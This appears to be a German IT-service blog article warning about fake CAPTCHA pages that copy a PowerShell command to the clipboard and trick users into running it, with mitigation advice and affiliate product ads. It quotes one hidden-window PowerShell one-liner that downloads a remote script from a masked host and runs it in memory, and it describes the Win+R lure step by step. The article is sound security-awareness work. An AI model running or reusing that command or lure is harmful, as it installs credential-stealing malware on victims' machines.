Fake CAPTCHA als Malware-Risiko: BSI rät zu besonderer Vorsicht

Die dunkle Seite der CAPTCHAs

CAPTCHAs sind seit Jahrzehnten ein bewährtes Mittel, um Websites vor automatisierten Angriffen zu schützen. Sie verlangen vom Nutzer, bestimmte Bilder auszuwählen, Zeichen einzugeben oder einfach ein Häkchen zu setzen, um zu beweisen, dass sie keine Bots sind. Genau dieses Vertrauen in CAPTCHAs wird jetzt von Cyberkriminellen missbraucht, um ahnungslose Nutzer zur unbeabsichtigten Installation von Malware zu verleiten.

Fake Captcha Malware

Eine besonders raffinierte Angriffskette wurde vom Conscia Security Operations Center (SOC) entdeckt und als CAPTCHA clipper bezeichnet. Die Methode kombiniert Social Engineering mit technischer Manipulation, um Nutzer zur Ausführung schädlicher PowerShell-Befehle zu bringen.

Das Bundesamt für Sicherheit in der Informationstechnik (BSI) sowie das Schweizerische Bundesamt für Cybersicherheit (BACS) warnen mittlerweile offiziell vor diesen Attacken.

Technische Analyse der CAPTCHA clipper-Angriffskette

Die Angriffsmethode nutzt mehrere Schritte, um den Schadcode auf den Systemen der Opfer auszuführen. Dabei wird eine Kombination aus JavaScript-Manipulation, PowerShell-Missbrauch und Command-and-Control (C2)-Kommunikation verwendet. Die folgenden Schritte beschreiben die technischen Hintergründe dieses raffinierten Angriffs.

1. Initiale Infektion: Das präparierte CAPTCHA

Der Angriff beginnt mit einer präparierten Webseite, die ein vermeintlich legitimes CAPTCHA enthält. Die technische Manipulation erfolgt über eingebettetes JavaScript, das eine bösartige Nutzlast vorbereitet.

Wie das bösartige CAPTCHA funktioniert:

  • Nutzer stoßen auf eine gefälschte Website, die ein Cloudflare-ähnliches CAPTCHA anzeigt.
  • Sobald das Häkchen bei „Ich bin kein Roboter“ gesetzt wird, wird unbemerkt ein PowerShell-Befehl in die Zwischenablage kopiert.
  • Ein zweites Pop-up-Banner erscheint mit Anweisungen zur Tastatureingabe. Hier werden Nutzer dazu gebracht:
  1. Win + R zu drücken, um das Ausführen-Fenster zu öffnen.
  2. Strg + V zu nutzen, um den schädlichen PowerShell-Befehl aus der Zwischenablage einzufügen.
  3. Enter zu drücken, wodurch der Befehl ohne das Wissen des Nutzers ausgeführt wird.

2. Der PowerShell-Angriff

Der kopierte PowerShell-Befehl ist darauf ausgelegt, Schadsoftware direkt aus dem Internet zu laden und auszuführen. Ein Beispiel für einen solchen Befehl nennt Consica im Blogartikel:

powershell -WindowStyle Hidden -Command “$rQd=‘https://xxxxxxxxxxxxx[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”

Was passiert bei der Ausführung dieses Befehls?

  • Die Datei prizev2.txt wird von einem externen Server geladen.
  • Diese Datei enthält weitere verschlüsselte Schadcode-Befehle, die mit Invoke-Expression direkt in der PowerShell ausgeführt werden.
  • Die Malware wird direkt im Speicher ausgeführt, um klassische Antiviren-Scanner zu umgehen.
  • In vielen Fällen wird eine Backdoor geöffnet, um weitere Schadsoftware herunterzuladen.

3. Installation und Persistenz

Nach der initialen Infektion installiert sich die Malware, indem sie:

  • Eine ZIP-Datei (prize.zip) von einem externen Server herunterlädt.
  • Die enthaltene Datei setup.exe ins APPDATA-Verzeichnis extrahiert und automatisch startet.
  • Persistenzmechanismen nutzt, darunter:
  • Eintrag in den Windows-Taskplaner, um sich nach jedem Neustart erneut auszuführen.
  • Erstellung einer zusätzlichen Datei (69HT8K.pif), die als Tarnung oder für weitere Angriffe genutzt wird.

Verwendete Techniken in der Übersicht

Die CAPTCHAclipper-Angriffskette setzt eine Vielzahl moderner Angriffstechniken ein:

TechnikErklärung
Social EngineeringNutzer werden durch bekannte Sicherheitsmechanismen (CAPTCHA) in falscher Sicherheit gewogen und zu gefährlichen Handlungen verleitet.
Clipboard HijackingSchadcode wird unbemerkt in die Zwischenablage kopiert und durch Nutzer selbst eingefügt.
Fileless MalwareSchadcode wird direkt im Arbeitsspeicher ausgeführt, ohne Dateien auf der Festplatte zu hinterlassen.
PowerShell ExploitationDie PowerShell wird als legitimes Windows-Werkzeug genutzt, um Befehle zu laden und auszuführen.
C2-KommunikationDie Malware baut eine Verbindung zu einem Angreifer-Server auf, um weitere Befehle zu empfangen.
Persistenz-MechanismenAutomatischer Neustart durch den Taskplaner oder das Eintragen ins APPDATA-Verzeichnis.

Wer steckt hinter den Angriffen?

Laut Conscia Security Operations Center (SOC) handelt es sich um einen erfahrenen Bedrohungsakteur, der gezielt Nutzer in Europa angreift. Die Hauptnutzlast wurde als eine Variante der LummaC2-Malware identifiziert, die darauf ausgelegt ist:

  • Zugangsdaten aus Webbrowsern und Messenger-Apps zu stehlen.
  • Kreditkarteninformationen abzugreifen.
  • Befehle auszuführen, um weitere Schadsoftware zu installieren.

Ein genaues Attributionsmodell liegt noch nicht vor, jedoch weisen die Angriffe auf eine hochentwickelte Gruppe hin, die in der Lage ist, ihre Angriffsstrategien dynamisch anzupassen, um Sicherheitslösungen zu umgehen.


Wie kann man sich schützen?

Um sich vor dieser neuen Angriffsmethode zu schützen, sollten Nutzer folgende Maßnahmen ergreifen:

1. Sicherheitsbewusstes Verhalten

  • Keine Tastenkombinationen auf unbekannten Webseiten ausführen!
  • Falls nach einem CAPTCHA eine zusätzliche Anweisung erscheint, sofort den Browser schließen.
  • Besondere Vorsicht bei Werbebannern oder Pop-ups, die eine Aktion verlangen.

2. Technische Schutzmaßnahmen

  • PowerShell restriktiver konfigurieren, z. B. durch Gruppenrichtlinien (Set-ExecutionPolicy Restricted).
  • Zwischenablage-Überwachung aktivieren, um unerwartete Inhalte zu blockieren.
  • Nutzung eines modernen Virenschutzes mit heuristischer Analyse.

3. Was tun im Infektionsfall?

Sollte der Verdacht bestehen, dass der eigene Rechner infiziert wurde:

  1. Sofort das Gerät vom Netzwerk trennen.
  2. Alle Passwörter ändern, insbesondere für Online-Banking und E-Mail-Konten.
  3. Den Rechner neu aufsetzen, um sicherzustellen, dass keine versteckte Schadsoftware aktiv bleibt.

Laut dem BSI und dem BACS sollten betroffene Systeme vollständig gelöscht und neu installiert werden, da moderne Malware oft tief ins System eingreift und nicht ohne Weiteres entfernt werden kann.

Fazit: Ein Weckruf für IT-Sicherheit

Die CAPTCHAclipper-Angriffe zeigen, wie Cyberkriminelle zunehmend kreative Methoden nutzen, um Sicherheitsmaßnahmen in Angriffsvektoren zu verwandeln. Durch die geschickte Kombination aus technischen Exploits und psychologischer Manipulation gelingt es den Tätern, Nutzer unbemerkt in die Falle zu locken.

Besonders besorgniserregend ist, dass die genutzten Techniken leicht angepasst und wiederverwendet werden können. Auch wenn bereits einige Sicherheitslösungen die erkannten Indikatoren für Kompromittierung (IOCs) blockieren, werden neue Varianten entstehen.

Nutzer und Unternehmen müssen daher wachsam bleiben, ihre IT-Sicherheitsstrategien kontinuierlich aktualisieren und sich stets bewusst sein: Nicht jedes CAPTCHA ist harmlos.

Wie hilfreich war dieser Beitrag?

Klicke auf die Sterne um zu bewerten!

Es tut uns leid, dass der Beitrag für dich nicht hilfreich war!

Lasse uns diesen Beitrag verbessern!

Wie können wir diesen Beitrag verbessern?

Meroth IT-Service ist Ihr lokaler IT-Dienstleister in Frankfurt am Main für kleine Unternehmen, Selbstständige und Privatkunden


Kostenfreie Ersteinschätzung Ihres Anliegens?

❱ Nehmen Sie gerne Kontakt auf ❰

Werbung

AVM FRITZ!Fon C6 DECT-Mobilteil Black Edition Schwarz*
Ersparnis 6%
UVP**: € 79,00
€ 73,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 77,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
FRITZ!Box 5690 Pro (Wi-Fi 7 Premium DSL- und Glasfaser-Router mit Triband (2,4 GHz, 5 GHz, 6 GHz) bis zu 18,5 GBit/s, für Glasfaser & DSL-Anschlüsse, WLAN Mesh, DECT-Basis, internationale Version)*
€ 316,00
Gewöhnlich versandfertig in 3 bis 7 Monaten
Preise inkl. MwSt., zzgl. Versandkosten
Epson EcoTank ET-5150 - Multifunktionsdrucker - Farbe 50€ Cashback*
€ 349,99
Preise inkl. MwSt., zzgl. Versandkosten
€ 369,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 399,95
Preise inkl. MwSt., zzgl. Versandkosten
Fritz!Box 6860 5G (Mobilfunk-Router mit bis zu 1.300 MBit/s in 5G/LTE, Wi-Fi 6 mit bis zu 3.000 MBit/s, Power Over Ethernet (PoE+), Staub- und spritzwassergeschütztes Gehäuse, Internationale Version)*
Ersparnis 3%
UVP**: € 489,00
€ 476,37
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
CT1000P3PSSD8 - Crucial P3 Plus SSD 1 TB, M.2 NVMe*
€ 59,95
Preise inkl. MwSt., zzgl. Versandkosten
€ 66,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 82,17
Gewöhnlich versandfertig in 3 bis 4 Tagen
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN Revodok Magnetische Dockingstation mit 4K@60Hz HDMI USB-C & USB-A, 100W PD Schnellladung USB C Hub kompatibel mit iPhone 16/15 Serie, iPad Pro und mehr*
€ 19,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Kingston NV3 NVMe PCIe 4.0 Interne SSD 1TB M.2 2280-SNV3S/1000G*
Ersparnis 9%
UVP**: € 54,90
€ 49,90
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
€ 49,90
Preise inkl. MwSt., zzgl. Versandkosten
€ 56,40
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo IdeaPad Slim 5 Laptop | 14" OLED Display | Intel Core i7-13620H | 16GB RAM | 512GB SSD | Intel Grafik | Windows 11 Home | QWERTZ | grau | 3 Monate Premium Care*
Ersparnis 3%
UVP**: € 879,00
€ 849,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Crucial X9 Pro 1TB Portable SSD Festplatte, bis zu 1050MB/s Lesen/Schreiben, Wasser- und Staubgeschützt (IP55), Externe SSD, USB-C 3.2 - CT1000X9PROSSD902*
€ 99,99
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Crucial X9 Pro für Mac 1TB Externe SSD Festplatte mit USB-A Adapter, bis zu 1050MB/s Lesen/Schreiben, Mac Ready, Wasser- und Staubgeschützt (IP55), USB-C 3.2 Portable SSD - CT1000X9PROMACSSD9B02*
€ 115,89
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN Nexode 65W USB C Ladegerät 4-Port GaN Netzteil Mehrfach Schnellladegerät PD Charger unterstützt PPS 45W kompatibel mit MacBook Pro/Air, HP Laptop, iPad Serien, iPhone 17, Galaxy S24*
Ersparnis 40%
UVP**: € 43,49
€ 25,97
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
UGREEN USB C Hub 10 Gbps, Adapter mit 4*USB C 3.2 Ports, Hochgeschwindigkeits USB C Multiport Splitter für iPhone 16 Serie, Galaxy S24, MacBook Pro, iMac, iPad Pro, Chromebook und mehr*
Ersparnis 22%
UVP**: € 17,99
€ 13,97
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
HP Laptop mit 17,3" FHD Display, AMD Ryzen 3 7320U, 8 GB DDR5 RAM, 512 GB SSD, AMD Radeon-Grafik, Windows 11, QWERTZ, Schwarz inkl. 25 GB Dropbox-Speicher für 12 Monate*
Ersparnis 20%
UVP**: € 499,00
€ 399,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Microsoft Office Home 2024 | Aktivierungscode per E-Mail*
Ersparnis 20%
UVP**: € 149,99
€ 119,99
Jetzt als Download verfügbar.
Preise inkl. MwSt., zzgl. Versandkosten
Lenovo Legion Slim 5 Gaming Laptop | 16" WQXGA 16:10 Display | 165Hz | AMD Ryzen 7 7435HS | 16GB RAM | 1TB SSD | NVIDIA GeForce RTX4070 TGP 140W | G-Sync | Win11 Home | QWERTZ | grau | AI Chip LA1*
€ 1.799,00
Auf Lager
Preise inkl. MwSt., zzgl. Versandkosten
Microsoft Office 2021 Home und Business | Dauerlizenz | Word, Excel, PowerPoint, Outlook | 1 PC/Mac | Aktivierungscode per E-Mail*
Ersparnis 12%
UVP**: € 299,00
€ 261,99
Jetzt als Download verfügbar.
Preise inkl. MwSt., zzgl. Versandkosten
(*) Werbung / Affiliate-Links: Wenn Sie auf einen dieser Links klicken und einkaufen, erhalte ich eine Provision. Für Sie verändert sich der Preis dadurch nicht. Zuletzt aktualisiert am 13. September 2025 um 6:55. Die hier gezeigten Preise können sich zwischenzeitlich auf der Seite des Verkäufers geändert haben. Alle Angaben ohne Gewähr.
(**) UVP: Unverbindliche Preisempfehlung

Preise inkl. MwSt., zzgl. Versandkosten
Abonnieren
Benachrichtige mich bei
0 Kommentare
Inline Feedbacks
Alle Kommentare anzeigen
Nach oben scrollen